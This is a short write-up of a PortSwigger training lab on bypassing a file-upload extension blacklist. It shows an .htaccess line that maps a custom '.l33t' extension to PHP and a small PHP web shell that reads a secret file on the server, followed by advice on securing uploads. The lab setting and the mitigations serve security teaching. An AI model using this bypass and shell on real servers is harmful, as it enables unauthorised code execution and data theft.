Figure 1.1: This image shows the Portswigger Lab’s title “Web Shell Upload via Extension Blacklist Bypass” and instructions to solve the challenge.
Analysis:
- Login using the provided user credentials such as wiener (username) and peter (password).
2. Check the File Upload parameter if there is a proper sanitation for extensions:
It seems like server doesn’t allow PHP file.
The server is an Apache/2.4.41
3. Search for possible vulnerabilities of the following Apache version.
It also emphasizes that attacker can be able to craft HTTP request and trick the web server.
Since PHP file extension doesn’t allow by the server, let’s try another way to execute PHP file by allowing the server to execute PHP commands using ‘.l33t’ extension as shown below:
AddType application/x-httpd-php .l33t
4. Create a file named “.htaccess” then add the said configuration setting:
5. Send another response and use “.l33t” to execute PHP script and solve the lab:
<?php $file=fopen("/home/carlos/secret","r");
$content = fread($file, filesize("/home/carlos/secret"));
echo $content;
?>
6. After that, access the “/files/avatars/exploit.l33t” using Burpsuite:
Recommendations:
- Rename uploaded files: Generate a unique filename for each uploaded file to prevent malicious users from overwriting or accessing sensitive files on the server. Avoid using user-provided filenames directly.
- Store files outside the web root: Save uploaded files in a directory located outside the web root, so they cannot be accessed directly through a URL. This helps prevent unauthorized access to the files.
- Disable script execution: Configure the server to disable script execution in the upload directories. This prevents uploaded files with malicious code from being executed as scripts on the server.